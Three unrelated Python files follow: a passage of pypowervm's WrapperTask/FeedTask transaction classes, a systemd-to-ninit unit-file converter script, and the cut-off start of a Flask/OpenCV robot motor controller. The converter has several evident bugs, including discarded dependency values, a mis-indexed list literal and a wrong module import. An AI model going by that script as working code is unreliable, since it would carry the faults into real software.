:param save_kwargs: Keyword arguments to be passed to the execute
method when it is invoked under a WrapperTask.
:param provides: (Optional) String name for the return value from the
execute method. If this parameter is used, the return
value will be saved by the surrounding WrapperTask and
be available to subsequent Subtasks via the 'provided'
keyword argument. The 'provides' name must be unique
within a WrapperTask.
:param flag_update: (Optional) Boolean indicating whether a True return
from this Subtask should trigger an update() in the
surrounding WrapperTask. By default, this is True.
Set this to False, for example, to provide some
data to subsequent Subtasks without forcing an
update.
"""
self.provides = save_kwargs.pop('provides', None)
self.flag_update = save_kwargs.pop('flag_update', True)
self.save_args = save_args
self.save_kwargs = save_kwargs
@abc.abstractmethod
def execute(self, *args, **kwargs):
"""Modify the EntryWrapper (must be overridden by the subclass).
The execute method has two responsibilities:
1) Performs the modification to the EntryWrapper which is passed as its
first argument.
2) Indicates whether any modifications were performed.
Example:
def execute(thingy_wrapper, primary_widget, provided=None):
update_needed = False
if primary_widget not in thingy_wrapper.widgets:
thingy_wrapper.set_primary_widget(primary_widget)
update_needed = True
# Was a widget list provided by a prior Subtask?
if provided is not None:
widget_list = provided.get('widget_list', [])
for widget in widget_list:
thingy_wrapper.widgets.append(widget)
update_needed = True
return update_needed
:param args: Positional arguments accepted by the execute method. The
first argument will always be the EntryWrapper. Overrides
may define their signatures using explicit parameter
names.
:param kwargs: Keyword arguments accepted by the execute method.
Overrides may use explicit parameter names.
:param provided: Dict of return values provided by Subtasks whose
execution preceded this one, and which used the
'provides' keyword argument to save their returns.
The keys of the dict are the 'provides' strings of the
prior Subtasks.
:return: The return value must be a single value (this may be a list,
but not a tuple) which evaluates to True or False. Unless
this Subtask was initialized with flag_update=False, any True
value indicates that the wrapper was modified and should be
POSTed back to the REST server via update(). Any False value
(including None, [], {}, etc) indicates that this Subtask did
not modify the wrapper. (Note that it may still be POSTed if
modified by other Subtasks in the same WrapperTask.)
"""
class _FunctorSubtask(Subtask):
"""Shim to create a Subtask around an existing callable."""
def __init__(self, _func, *save_args, **save_kwargs):
"""Save the callable as well as the arguments.
:param _func: Callable to be invoked under the WrapperTask.
:param save_args: See Subtask.__init__(save_args).
:param save_kwargs: See Subtask.__init__(save_kwargs). May contain the
following values, which are treated specially and
NOT passed to the callable _func:
provides: See Subtask.__init__(provides).
flag_update: See Subtask.__init__(flag_update).
logspec: Iterable comprising a logging function, a format
string, and zero or more arguments. The log method is
invoked before the func. Example:
logspec = [LOG.info, _LI("Deleting widget %(widget)s from "
"instance %(instance)s."),
{'widget': widg, 'instance': instance.name}]
FunctorSubtask(..., logspec=logspec)
"""
self._logspec = save_kwargs.pop('logspec', [])
super(_FunctorSubtask, self).__init__(*save_args, **save_kwargs)
self._func = _func
if self._logspec:
if len(self._logspec) < 2 or not callable(self._logspec[0]):
raise ValueError(
"logspec must be a list comprising a callable followed by "
"a format string and zero or more arguments.")
def execute(self, wrapper, *_args, **_kwargs):
"""Invoke saved callable with saved args."""
if not ('provided' in reflection.get_callable_args(self._func)
or reflection.accepts_kwargs(self._func)):
_kwargs.pop('provided', None)
if self._logspec:
# Execute the log method (the first element in the list) with its
# arguments (the remaining elements in the list).
self._logspec[0](*self._logspec[1:])
return self._func(wrapper, *_args, **_kwargs)
class WrapperTask(tf_task.Task):
"""An atomic modify-and-POST transaction Task over a single EntryWrapper.
The modifications should comprise some number of Subtask instances, added
to this WrapperTask via the add_subtask and/or add_functor_subtask methods.
These Subtasks should only modify the EntryWrapper, and should not POST
(.update()) it back to the REST Server. The WrapperTask will decide
whether a POST is needed based on the returns from the Subtasks' execute
methods, and perform it if indicated.
The WrapperTask's execute method is encompassed by @entry_transaction,
meaning that:
1) The initial GET of the EntryWrapper may be deferred until after the lock
is acquired.
2) The execute method is locked on the UUID of the Entry in question.
3) If the final update (POST) fails due to etag mismatch, the EntryWrapper
is refetched and the entire transaction is redriven from the start.
Usage:
class ModifyGizmos(Subtask):
def execute(self, wrapper, gizmo_list, provides='first_gizmo'):
update_needed = None
if gizmo_list:
wrapper.gizmos.append(gizmo_list)
update_needed = gizmo_list[0]
return update_needed
def add_widget(wrapper, widget, frob=False, provided=None):
if provided is not None:
widget.first_gizmo = provided.get('first_gizmo')
wrapper.widgets.append(widget, frob)
return len(wrapper.widgets)
...
tx = WrapperTask("do_lpar_things", LPAR.getter(adapter, lpar_uuid))
or
tx = WrapperTask("do_lpar_things", LPAR.getter(adapter, lpar_uuid),
subtasks=existing_wrapper_task.subtasks)
or
# Not recommended - increased probability of retry
wrapper = LPAR.wrap(adapter.read(LPAR.schema_type, lpar_uuid))
tx = WrapperTask("do_lpar_things", wrapper)
...
tx.add_subtask(ModifyGizmos([giz1, giz2]))
...
logspec = [LOG.info, _LI("Added widget %(widget)s to LPAR %(lpar)s."),
{'widget': widget.name, 'lpar': lpar_uuid}]
tx.add_functor_subtask(add_widget, widget, provides='widget_count',
logspec=logspec)
...
finalized_lpar = tx.execute()
"""
def __init__(self, name, wrapper_or_getter, subtasks=None,
allow_empty=False, update_timeout=-1):
"""Initialize this WrapperTask.
:param name: A descriptive string name for the WrapperTask.
:param wrapper_or_getter: An EntryWrapper or EntryWrapperGetter
representing the PowerVM object on which this
WrapperTask is to be performed.
:param subtasks: (Optional) Iterable of Subtask subclass instances with
which to seed this WrapperTask.
:param allow_empty: (Optional) By default, executing a WrapperTask
containing no Subtasks will result in exception
WrapperTaskNoSubtasks. If this flag is set to
True, this condition will instead log an info
message and return None (NOT the wrapper - note,
this is different from "subtasks ran, but didn't
change anything," which returns the wrapper).
:param update_timeout: (Optional) Integer number of seconds after which
to time out the POST request. -1, the default,
causes the request to use the timeout value
configured on the Session belonging to the
Adapter.
:raise WrapperTaskNoSubtasks: If allow_empty is False and this
WrapperTask is executed without any
Subtasks having been added.
"""
if isinstance(wrapper_or_getter, ewrap.EntryWrapperGetter):
self._wrapper = None
self._getter = wrapper_or_getter
elif isinstance(wrapper_or_getter, ewrap.EntryWrapper):
self._wrapper = wrapper_or_getter
self._getter = None
else:
raise ValueError(_("Must supply either EntryWrapper or "
"EntryWrapperGetter."))
super(WrapperTask, self).__init__(
name, provides=('wrapper_%s' % wrapper_or_getter.uuid,
'subtask_rets_%s' % wrapper_or_getter.uuid))
self._tasks = [] if subtasks is None else list(subtasks)
self.allow_empty = allow_empty
self.update_timeout = update_timeout
# Dict of return values provided by Subtasks using the 'provides' arg.
self.provided = {}
# Set of 'provided' names to prevent duplicates. (Some day we may want
# to make this a list and use it to denote the order in which subtasks
# were run.)
self.provided_keys = set()
def add_subtask(self, task):
"""Add a Subtask to this WrapperTask.
Subtasks will be invoked serially and synchronously in the order in
which they are added.
:param task: Instance of a Subtask subclass containing the logic to
invoke.
:return: self, for chaining convenience.
"""
if not isinstance(task, Subtask):
raise ValueError(_("Must supply a valid Subtask."))
# Seed the 'provided' dict and ensure no duplicate names
if task.provides is not None:
if task.provides in self.provided_keys:
raise ValueError(_("Duplicate 'provides' name %s.") %
task.provides)
self.provided_keys.add(task.provides)
self._tasks.append(task)
return self
def add_functor_subtask(self, func, *args, **kwargs):
"""Create and add a Subtask for an already-defined method.
:param func: A callable to be the core of the Subtask. The contract
for this method is identical to that of Subtask.execute -
see that method's docstring for details.
:param args: Positional arguments to be passed to the callable func
(after the EntryWrapper parameter) when it is executed
within the WrapperTask.
:param kwargs: Keyword arguments to be passed to the callable func when
it is executed within the WrapperTask. May contain the
following values, which are treated specially and NOT
passed to the callable func:
provides: See Subtask.__init__(provides).
flag_update: See Subtask.__init__(flag_update).
logspec: Iterable comprising a logging function, a format
string, and zero or more arguments. The log method is
invoked before the func. Example:
logspec = [LOG.info, _LI("Deleting widget %(widget)s from "
"instance %(instance)s."),
{'widget': widg, 'instance': instance.name}]
FunctorSubtask(..., logspec=logspec)
:return: self, for chaining convenience.
"""
return self.add_subtask(_FunctorSubtask(func, *args, **kwargs))
@property
def wrapper(self):
"""(Fetches and) returns the EntryWrapper.
Use this only if you need the EntryWrapper outside of the WrapperTask's
execution itself.
Note that this guarantees a GET outside of lock, and should therefore
be used only if absolutely necessary.
"""
if not self._wrapper:
self._wrapper = self._getter.get()
# NOTE: This access of self._wrapper must remain atomic.
# See TAG_WRAPPER_SYNC.
return self._wrapper
@property
def subtasks(self):
"""Return the sequence of Subtasks registered with this WrapperTask.
This is returned as a tuple (not modifiable). To add subtasks, use the
add_[functor_]subtask method.
"""
return tuple(self._tasks)
def execute(self):
"""Invoke subtasks and update under @entry_transaction.
The flow is as follows:
1 Lock on wrapper UUID
2 GET wrapper if necessary
3 For each registered Subtask:
- Invoke the Subtask to modify the wrapper
4 If update is necessary, POST the wrapper. If POST fails with etag
mismatch:
- Refresh the wrapper
- goto 2
5 Unlock
"""
if len(self._tasks) == 0:
if self.allow_empty:
LOG.info(_("WrapperTask %s has no Subtasks; no-op execution."),
self.name)
return None
raise ex.WrapperTaskNoSubtasks(name=self.name)
@entry_transaction
def _execute(wrapper):
update_needed = False
for task in self._tasks:
kwargs = task.save_kwargs
if ('provided' in reflection.get_callable_args(task.execute)
or reflection.accepts_kwargs(task.execute)):
kwargs['provided'] = self.provided
ret = task.execute(wrapper, *task.save_args, **kwargs)
if task.flag_update and ret:
update_needed = True
if task.provides is not None:
self.provided[task.provides] = ret
if update_needed:
wrapper = wrapper.update(timeout=self.update_timeout)
return wrapper
# Use the wrapper if already fetched, or the getter if not
# NOTE: This assignment must remain atomic. See TAG_WRAPPER_SYNC.
self._wrapper = _execute(self._wrapper or self._getter)
return self._wrapper, self.provided
class ContextThreadPoolExecutor(th.ThreadPoolExecutor):
def submit(self, fn, *args, **kwargs):
context = ctx.get_current()
# Get the list of locks held by this thread, we don't want sub
# tasks locking the same thing!
held_locks = list(_get_locks())
def wrapped():
# This is executed in the new thread.
if context is not None:
context.update_store()
# Ensure the sub task knows about the parent's locks and doesn't
# block on them.
_set_locks(held_locks)
return fn(*args, **kwargs)
return super(ContextThreadPoolExecutor, self).submit(wrapped)
class FeedTask(tf_task.Task):
"""Invokes WrapperTasks in parallel over each EntryWrapper in a feed.
Usage
Creation:
# Preferred
fm = FeedTask('lpar_frobnicate', LPAR.getter(adapter))
or
# Non-preferred. See 'Greedy Methods' warning below
feed = LPAR.wrap(adapter.read(LPAR.schema_type, ...))
fm = FeedTask('lpar_frobnicate', feed)
Adding Subtasks:
# Preferred
fm.add_subtask(FrobnicateLpar(foo, bar))
fm.add_functor_subtask(frobnify, abc, xyz)
and/or
# Non-preferred. See 'Greedy Methods' warning below
for uuid, txn in fm.wrapper_tasks.items():
if meets_criteria(txn.wrapper, uuid):
txn.add_subtask(FrobnicateLpar(baz, blah))
fm.wrapper_tasks[known_uuid].add_subtask(FrobnicateLpar(baz, blah)
Execution/TaskFlow management:
main_flow.add(fm)
...
taskflow.engines.run(main_flow)
Warning: Greedy Methods
This implementation makes every effort to defer the feed GET as long as
possible. The more time passes between the GET and the execution of the
WrapperTasks, the more likely it is that some out-of-band change will have
modified one of the objects represented in the feed. This will cause an
etag mismatch on that WrapperTask's update (POST), resulting in that
WrapperTask being redriven, which costs an extra GET+POST to the REST
server.
Consumers of this class can thwart these efforts by:
a) Initializing the FeedTask with an already-retrieved feed instead of a
FeedGetter; or
b) Using any of the following methods/properties prior to execution. All
of these will trigger a GET of the feed if not already fetched:
.wrapper_tasks
.get_wrapper(uuid)
.feed
The cost is incurred only the first time one of these is used. If your
workflow requires calling one of these early, it is not necessary to
avoid them subsequently.
"""
def __init__(self, name, feed_or_getter, max_workers=10,
update_timeout=-1):
"""Create a FeedTask with a FeedGetter (preferred) or existing feed.
:param name: A descriptive string name. This will be used along with
each wrapper's UUID to generate the name for that
wrapper's WrapperTask.
:param feed_or_getter: pypowervm.wrappers.entry_wrapper.FeedGetter or
an already-fetched feed (list of EntryWrappers)
over which to operate.
:param max_workers: (Optional) Integer indicating the maximum number of
worker threads to run in parallel within the .flow
or by the .execute method. See
concurrent.futures.ThreadPoolExecutor(max_workers).
:param update_timeout: (Optional) Integer number of seconds after which
to time each WrapperTask's POST request. -1,
the default, causes the request to use the
timeout value configured on the Session
belonging to the Adapter.
"""
super(FeedTask, self).__init__(name)
if isinstance(feed_or_getter, ewrap.FeedGetter):
self._feed = None
self._getter = feed_or_getter
elif isinstance(feed_or_getter, list):
# Make sure the feed has something in it.
if len(feed_or_getter) == 0:
raise ex.FeedTaskEmptyFeed()
# Make sure it's a list of EntryWrapper
if [i for i in feed_or_getter
if not isinstance(i, ewrap.EntryWrapper)]:
raise ValueError("List must contain EntryWrappers "
"exclusively.")
self._feed = feed_or_getter
self._getter = None
else:
raise ValueError(_("Must supply either a list of EntryWrappers or "
"a FeedGetter."))
# Max WrapperTasks to run in parallel
self.max_workers = max_workers
self.update_timeout = update_timeout
# Map of {uuid: WrapperTask}. We keep this empty until we need the
# individual WraperTasks. This is triggered by .wrapper_tasks and
# .get_wrapper(uuid) (and obviously executing).
self._tx_by_uuid = {}
# Until we *need* individual WrapperTasks, save subtasks in one place.
# EntryWrapperGetter is a cheat to allow us to build the WrapperTask.
self._common_tx = WrapperTask(
'internal', ewrap.EntryWrapperGetter(None, ewrap.Wrapper,
None))
self._post_exec = []
@property
def wrapper_tasks(self):
"""(Greedy) Dictionary of {uuid: WrapperTask} for all wrappers.
The first access of this property triggers a GET of the feed if it has
not already been fetched, so use judiciously.
"""
if not self._tx_by_uuid:
# Create a separate WrapperTask for each wrapper in the feed.
# As long as the consumer uses FeedTask.add_[functor_]subtask
# and doesn't ask for .wrapper_tasks, we keep only one copy of the
# subtask list. Once the consumer "breaks the seal" and requests
# individual WrapperTasks per wrapper, we need to (GET the feed -
# this is triggered by .feed - and) create them based on this
# common subtask list.
# This is only done once. Thereafter, .add_[functor_]subtask will
# add separately to each WrapperTask.
for entry in self.feed:
name = '%s_%s' % (self.name, entry.uuid)
self._tx_by_uuid[entry.uuid] = WrapperTask(
name, entry, subtasks=self._common_tx.subtasks,
allow_empty=True, update_timeout=self.update_timeout)
return self._tx_by_uuid
def get_wrapper(self, uuid):
"""(Greedy) Returns the EntryWrapper associated with a particular UUID.
Note that this method triggers a GET of the feed if it has not already
been fetched, so use judiciously.
:param uuid: The UUID of the wrapper of interest.
:return: The EntryWrapper instance with the specified UUID.
:raise KeyError: If there's no WrapperTask for a wrapper with the
specified UUID.
"""
# Grab it from the WrapperTask map (O(1)) rather than the feed (O(n)).
# It'll also be up to date without having to trigger a feed rebuild.
return self.wrapper_tasks[uuid].wrapper
def add_subtask(self, task):
"""Add a Subtask to *all* WrapperTasks in this FeedTask.
To add Subtasks to individual WrapperTasks, iterate over the result of
the 'wrapper_tasks' property.
Specification is the same as for WrapperTask.add_subtask.
"""
if self._tx_by_uuid:
# _tx_by_uuid is guaranteed to have WrapperTasks for all UUIDs,
# including this one
for txn in self._tx_by_uuid.values():
txn.add_subtask(task)
else:
self._common_tx.add_subtask(task)
return self
def add_functor_subtask(self, func, *args, **kwargs):
"""Add a functor Subtask to *all* WrapperTasks in this FeedTask.
To add Subtasks to individual WrapperTasks, iterate over the result of
the 'wrapper_tasks' property.
Specification is the same as for WrapperTask.add_functor_subtask.
"""
return self.add_subtask(_FunctorSubtask(func, *args, **kwargs))
def add_post_execute(self, *tasks):
"""Add some number of TaskFlow Tasks to run after the WrapperTasks.
Such Tasks may 'require' a parameter called wrapper_task_rets, which
will be a dict of the form:
{uuid: {
'wrapper': wrapper,
label1: return_value,
label2: return_value,
...
labelN: return_value}}
...where:
uuid is the UUID of the WrapperTask's wrapper.
wrapper is the WrapperTask's wrapper in its final (possibly-updated)
form.
labelN: return_value are the return values from Subtasks using the
'provides' mechanism. Each label corresponds to the name
given by the Subtask's 'provides' argument.
:param tasks: Some number of TaskFlow Tasks (or Flows) to be executed
linearly after the parallel WrapperTasks have completed.
"""
self._post_exec.extend(tasks)
@property
def feed(self):
"""(Greedy) Returns this FeedTask's feed (list of wrappers).
The first access of this property triggers a GET of the feed if it has
not already been fetched, so use this only if you need the
EntryWrappers outside of the execution itself.
"""
if self._feed is None:
self._feed = self._getter.get()
if len(self._feed) == 0:
raise ex.FeedTaskEmptyFeed()
# Do we need to refresh the feed based on having been run?
# If we haven't replicated WrapperTasks yet, there's no chance we're
# out of sync - and we don't want to trigger GET/replication.
if self._tx_by_uuid:
# Rebuild the entire feed from the WrapperTasks' .wrappers.
# TAG_WRAPPER_SYNC
# Note that, if this happens while the WrapperTasks are running,
# we may be grabbing the wrapper from a WrapperTask "while" it is
# being changed as the result of an update(). This is threadsafe as
# long as the assignment (by WrapperTask.execute) and the accessor
# (WrapperTask.wrapper) remain atomic by using simple =/return.
for wrap in self._feed:
if self.get_wrapper(wrap.uuid).etag != wrap.etag:
# Refresh needed
self._feed = [tx.wrapper for tx in
self.wrapper_tasks.values()]
break
return self._feed
@staticmethod
def _process_subtask_rets(subtask_rets):
"""Reshape the dict of wrapper_{uuid} and subtask_rets_{uuid}.
Input form: {'wrapper_%(uuid)s': EntryWrapper,
'subtask_rets_%(uuid)s': {
label1: return_value,
label2: return_value,
...,
labelN: return_value}}
Output form: {uuid: {
'wrapper': EntryWrapper,
label1: return_value,
label2: return_value,
...,
labelN: return_value}}
"""
ret = {}
for key, val in subtask_rets.items():
label, uuid = key.rsplit('_', 1)
if label != 'wrapper':
ret[uuid] = dict(val,
wrapper=subtask_rets['wrapper_%s' % uuid])
return ret
def execute(self):
"""Run this FeedTask's WrapperTasks in parallel TaskFlow engine.
:return: Dictionary of results provided by subtasks and post-execs.
The shape of this dict is as normally expected from TaskFlow,
noting that the WrapperTasks are executed in a subflow and
their results processed into wrapper_task_rets. For example:
{'wrapper_task_rets': { uuid: {...}, uuid: {...}, ...}
'post_exec_x_provides': ...,
'post_exec_y_provides': ...,
...}
"""
# Ensure a true no-op (in particular, we don't want to GET the feed) if
# there are no Subtasks
if not any([self._tx_by_uuid, self._common_tx.subtasks,
self._post_exec]):
LOG.info(_("FeedTask %s has no Subtasks; no-op execution."),
self.name)
return
rets = {'wrapper_task_rets': {}}
try:
# Calling .wrapper_tasks will cause the feed to be fetched and
# WrapperTasks to be replicated, if not already done. Only do this
# if there exists at least one WrapperTask with Subtasks.
# (NB: It is legal to have a FeedTask that *only* has post-execs.)
if self._tx_by_uuid or self._common_tx.subtasks:
pflow = tf_uf.Flow("%s_parallel_flow" % self.name)
pflow.add(*self.wrapper_tasks.values())
# Execute the parallel flow now so the results can be provided
# to any post-execs.
rets['wrapper_task_rets'] = self._process_subtask_rets(
tf_eng.run(
pflow, engine='parallel',
executor=ContextThreadPoolExecutor(self.max_workers)))
if self._post_exec:
flow = tf_lf.Flow('%s_post_execs' % self.name)
flow.add(*self._post_exec)
eng = tf_eng.load(flow, store=rets)
eng.run()
rets = eng.storage.fetch_all()
except tf_ex.WrappedFailure as wfail:
LOG.error(_("FeedTask %s experienced multiple exceptions. They "
"are logged individually below."), self.name)
for fail in wfail:
LOG.exception(fail.pformat(fail.traceback_str))
raise ex.MultipleExceptionsInFeedTask(self.name, wfail)
# Let a non-wrapped exception (which happens if there's only one
# element in the feed) bubble up as-is.
return rets
|
|
import configparser
import argparse
import glob
import shlex
from os import path
import os
import re
from itertools import chain
from collections import OrderedDict
#for now, we don't want these prefixes
cmd_prefix=re.compile('^[@-]{1,2}')
#Special Dictionary to deal with how systemd unit files are structured
class SystemdODict(OrderedDict):
PILE_ME_UP=('Requires','RequiresOverrideable','Requisite',
'Wants','BindsTo', 'PartOf','Conflicts','Before',
'After','OnFailure','PropagatesReloadTo','ReloadPropagatedFrom',
'JoinsNamespaceOf','Alias','WantedBy','RequiredBy','Also',
'ReadWriteDirectories', 'ReadOnlyDirectories', 'InaccessibleDirectories',
'SupplementaryGroups')
UNNEEDED_DEPS=['network.target','network-online.target','umount.target','basic.target']
def __setitem__(self, key, value):
print(value)
if isinstance(value, list) and key in self:
self[key].extend(value)
else:
if key in self.PILE_ME_UP:
value=shlex.split(' ')
#print(key,value)
super(OrderedDict, self).__setitem__(key, value)
def ninit_service(cfg,f):
#we'll need a way to make a service maker based on templates
service_name=path.splitext(path.basename(f))[0]
newf = path.join(path.abspath(args.output),service_name)
if not(path.exists(newf)):
os.makedirs(newf)
#handle anything in in [Unit] first
## Let's create a short README to help preserve documentation
README=['# {}'.format(service_name)]
if 'Description' in cfg['Unit']:
README.extend(cfg['Unit']['Description'])
README.append(' ')
if 'Documentation' in cfg['Unit']:
README.extend(['Unit']['Documentation'])
if len(README) > 1:
readme_file = open(path.join(newf,'README'),'w')
readme_file.write('\n'.join(README))
readme_file.close()
## End README
## Handle dependencies
# handle Hard dependencies first
depends=[]
if 'Requires' in cfg['Unit']:
depends.extend(cfg['Unit']['Requires'])
if 'Wants' in cfg['Unit']:
depends.extend(cfg['Unit']['Wants'])
else:
#it's probably specified in the directories
syswants=os.path.join('/usr/lib/systemd/system',service_name,'.wants','*')
etcwants=os.path.join('/etc/systemd/system',service_name,'.wants','*')
depends.extend([path.splitext(path.basename(n))[0] for n in glob.iglob(syswants)])
depends.extend([path.splitext(path.basename(n))[0] for n in glob.iglob(etcwants)])
if 'Requisite' in cfg['Unit']:
depends.extend(cfg['Unit']['Requisite']) #how does ninit handle failing dependencies?
#add some nsvc -g <Requisite> to the setup or run script and prevent it from running if otherwise?
if 'BindsTo' in cfg['Unit']:
depends.extend(cfg['Unit']['BindsTo'])
#be sure to tell the script later to write a special run or end file?
if 'PartOf' in cfg['Unit']:
depends.extend(cfg['Unit']['PartOf'])
if 'Conflicts' in cfg['Unit']:
#check in setup if any of the conflicting services are here
pass
if 'OnFailure' in cfg['Unit']:
#check if our service failed fantastically in end and launch those if we durped
pass
## Check any Conditionals and write those to a special setup file
setup=[]
## Once ExecStartPre things are gathered too
if 'Service' in cfg:
#then in [Service]
sertype=cfg['Service'].get('Type', [''])[0]
if not sertype and 'BusName' not in cfg['Service']:
sertype='simple'
elif not sertype and 'BusName' in cfg['Service']:
sertype='dbus'
if sertype=='dbus':
depends.append('dbus')
elif sertype=='oneshot':
sync_file=open(path.join(newf,'sync'),'w')
sync_file.write('')
sync_file.close()
## We're done collecting dependencies, let's write the depends file
## also, add any mentioned files that aren't part of the conversion
## to be processed later
#print(depends)
if len(depends) > 1:
#separate these into before and after
#now remove anything silly, like network.target
for d in SystemdODict.UNNEEDED_DEPS:
if d in depends: depends.remove(d)
#if they're specified in after, write them to depends
depends_file=open(path.join(newf,'depends'),'w')
depends_file.write('\n'.join([path.splitext(i)[0] for i in depends]))
#if they're specified in before, write them to a special end file
depends_file.close()
## End Handle dependencies
if cfg['Service'].get('PIDFile',[''])[0] != '':
pidfile=open(path.join(newf,'pidfile'),'w')
pidfile.write(cfg['Service']['PIDFile'][0])
pidfile.close()
#support multiple ExecStart in the case of oneshots
cmd=list(filter(('').__ne__, cfg['Service'].get('ExecStart',[''])))
#strip - and @ at the beginning
cmd_length=len(cmd)
#get this out of the way
reload_start=shlex.split(cfg['Service'].get('ExecReload',['/bin/kill'])[0])[0]
does_not_handle_sighup=path.basename(reload_start) != 'kill'
if 'ExecStop' in cfg['Service'] or \
(does_not_handle_sighup and sertype != 'oneshot') or \
(';' in cmd and cmd_length == 1) or cmd_length > 1:
import stat
runpath=path.join(newf,'run')
run_file=open(runpath,'w')
run_file.write('#!/bin/sh\n')
if 'ExecStop' in cfg['Service']:
if len(cfg['Service']['ExecStop']) > 1:
run_file.write("trap './stop' SIGTERM\n")
stop_path=path.join(newf,'stop')
stop_file=open(stop_path,'w')
stop_file.write('#!/bin/sh\n')
stop_file.write('\n'.join([cmd_prefix.sub('',c) \
for c in cfg['Service']['ExecStop']]))
stop_file.close()
else:
stopcmd=cmd_prefix.sub('',cfg['Service']['ExecStop'][0])
run_file.write("trap {} SIGTERM\n".format(shlex.quote(stopcmd)))
#if there's an execreload specified in the file, does this imply it DOESN'T
#handle sighup to reload?
if (does_not_handle_sighup and sertype != 'oneshot'):
if len(cfg['Service']['ExecReload']) > 1:
run_file.write("trap './reload' SIGHUP\n")
reload_path=path.join(newf,'reload')
reload_file=open(reload_path,'w')
reload_file.write('#!/bin/sh\n')
reload_file.write('\n'.join([cmd_prefix.sub('',c) \
for c in cfg['Service']['ExecReload']]))
reload_file.close()
else:
reloadcmd=cmd_prefix.sub('',cfg['Service']['ExecReload'][0])
run_file.write("trap {} SIGHUP\n".format(shlex.quote(reloadcmd)))
run_file.write
run_file.write('\n'.join([cmd_prefix.sub('',c) for c in cmd])) #write bindto stuff here?
run_file.close()
st=os.stat(runpath)
os.chmod(runpath,st.st_mode|stat.S_IXUSR|stat.S_IXGRP|stat.S_IXOTH)
elif cmd_length == 1:
cmd_parts=shlex.split(cmd[0])
runpath=path.join(newf,'run')
if path.exists(runpath):
os.remove(runpath)
os.symlink(cmd_prefix.sub('',cmd_parts[0]),runpath)
params=open(path.join(newf,'params'),'w')
params.write('\n'.join(cmd_parts[1:]))
params.close()
if 'ExecStartPre' in cfg['Service']:
setup.extend(cfg['Service']['ExecStartPre'])
end=[]
if 'ExecStartPost' in cfg['Service']:
end.extend(cfg['Service']['ExecStartPost'])
#handle ExecStop and ExecStopPost how? I think by writing that special run file, but idk
if 'EnvironmentFile' in cfg['Service']:
import shutil
shutil.copy(cfg['Service']['EnvironmentFile'][0],path.join(newf,'environ'))
elif 'Environment' in cfg['Service']:
environ=cfg['Service']['Environment'][0]
if 'WorkingDirectory' in cfg['Service']:
environ.append('PWD={}'.format(cfg['Service']['WorkingDirectory'][0]))
environ='\n'.join(shlex.split(environ))
environ_file=open(path.join(newf,'environ'),'w')
environ_file.write(environ)
environ_file.close()
if 'User' in cfg['Service']:
try:
uid=int(cfg['Service']['User'][0])
except ValueError as e:
from pwd import getpwnam
uid=getpwnam(cfg['Service']['User'][0]).pw_uid
if 'Group' in cfg['Service']:
try:
gid=int(cfg['Service']['Group'][0])
except ValueError as e:
from grp import getgrnam
gid=getgrnam(cfg['Service']['Group'][0]).gr_gid
else:
from pw import getpwuid
gid=getpwuid(uid).gr_gid
more_gids=[]
if 'SupplementaryGroups' in cfg['Service']:
for i in cfg['Service']['SupplementaryGroups']:
try:
ggid=int(i)
except ValueError as e:
from grp import getgrnam
ggid=getgrnam(i).gr_gid
more_gids.append(ggid)
uid_file=open(path.join(newf,'uid'),'w')
uid_file.write("{}:{}{}".format(uid,gid,
":{}".format(":".join(more_gids)) \
if len(more_gids) > 0 else ""))
uid_file.close()
if cfg['Service'].get('Restart',['no'])[0] != 'no':
respawn_file=open(path.join(newf,'respawn'),'w')
respawn_file.write('')
respawn_file.close()
sleep=cfg['Service']['RestartSec'] if 'RestartSec' in cfg['Service'] else '1'
#check for time format and change it to just seconds
sleep_file=open(path.join(newf,'sleep'),'w')
sleep_file.write(sleep)
sleep_file.close()
if len(end) > 0:
import stat
endpath=path.join(newf,'end')
end_file=open(endpath,'w')
end_file.write('#!/bin/sh\n')
end_file.write('\n'.join([cmd_prefix.sub('',c) for c in end])) #write bindto stuff here?
end_file.close()
st=os.stat(endpath)
os.chmod(endpath,st.st_mode|stat.S_IXUSR|stat.S_IXGRP|stat.S_IXOTH)
if len(setup) > 0:
import stat
setuppath=path.join(newf,'setup')
setup_file=open(setuppath,'w')
setup_file.write('#!/bin/sh\n')
setup_file.write('\n'.join([cmd_prefix.sub('',c) for c in setup])) #write bindto stuff here?
setup_file.close()
st=os.stat(setuppath)
os.chmod(setuppath,st.st_mode|stat.S_IXUSR|stat.S_IXGRP|stat.S_IXOTH)
elif 'Socket' in cfg:
#we only care about file listen streams
pass
elif 'Mount' in cfg:
#output to args.output/fstab.addons
pass
if 'Automount' in cfg:
#output to args.output/fstab.addons
#treat this as if defaults and type = auto?
pass
elif 'Swap' in cfg:
#output to args.output/fstab.addons
pass
elif 'Path' in cfg:
#write to the args.output/incron.addons
pass
elif 'Timer' in cfg:
#write to the args.output/cron.addons
pass
print(f,"->",newf)
parser = argparse.ArgumentParser(description='Convert systemd files to ninit service directories')
parser.add_argument('--output','-o',type=str,
help="Output the service directory into this folder",default=".")
parser.add_argument('files',metavar='F',type=str,nargs='*',help="Service files to convert")
args = parser.parse_args()
if len(args.files) < 1:
files = chain(glob.iglob('/usr/lib/systemd/system/*.service'),
glob.iglob('/usr/lib/systemd/system/*.socket'))
else:
files=args.files
#/usr/lib/systemd/system/wicd.service
for f in files:
with open(f, 'r') as service_file:
cfg = configparser.RawConfigParser(dict_type=SystemdODict,strict=False)
cfg.read_file(service_file)
ninit_service(cfg,f)
|
|
import cv2
import numpy as np
import signal
import sys
from flask import Flask, render_template, Response, request
from collections import deque
from datetime import datetime
from time import time, sleep
from threading import Thread
try:
from PyMata.pymata import PyMata
class Motors(Thread):
MOTOR_1_PWM = 2
MOTOR_1_A = 3
MOTOR_1_B = 4
MOTOR_2_PWM = 5
MOTOR_2_A = 6
MOTOR_2_B = 7
MOTOR_3_PWM = 8
MOTOR_3_A = 9
MOTOR_3_B = 10
def __init__(self):
Thread.__init__(self)
self.daemon = True
self.board = PyMata()
def signal_handler(sig, frame):
self.stop_motors()
self.board.reset()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
self.board.set_pin_mode(self.MOTOR_1_PWM, self.board.PWM, self.board.DIGITAL)
self.board.set_pin_mode(self.MOTOR_1_A, self.board.OUTPUT, self.board.DIGITAL)
self.board.set_pin_mode(self.MOTOR_1_B, self.board.OUTPUT, self.board.DIGITAL)
self.board.set_pin_mode(self.MOTOR_2_PWM, self.board.PWM, self.board.DIGITAL)
self.board.set_pin_mode(self.MOTOR_2_A, self.board.OUTPUT, self.board.DIGITAL)
self.board.set_pin_mode(self.MOTOR_2_B, self.board.OUTPUT, self.board.DIGITAL)
self.board.set_pin_mode(self.MOTOR_3_PWM, self.board.PWM, self.board.DIGITAL)
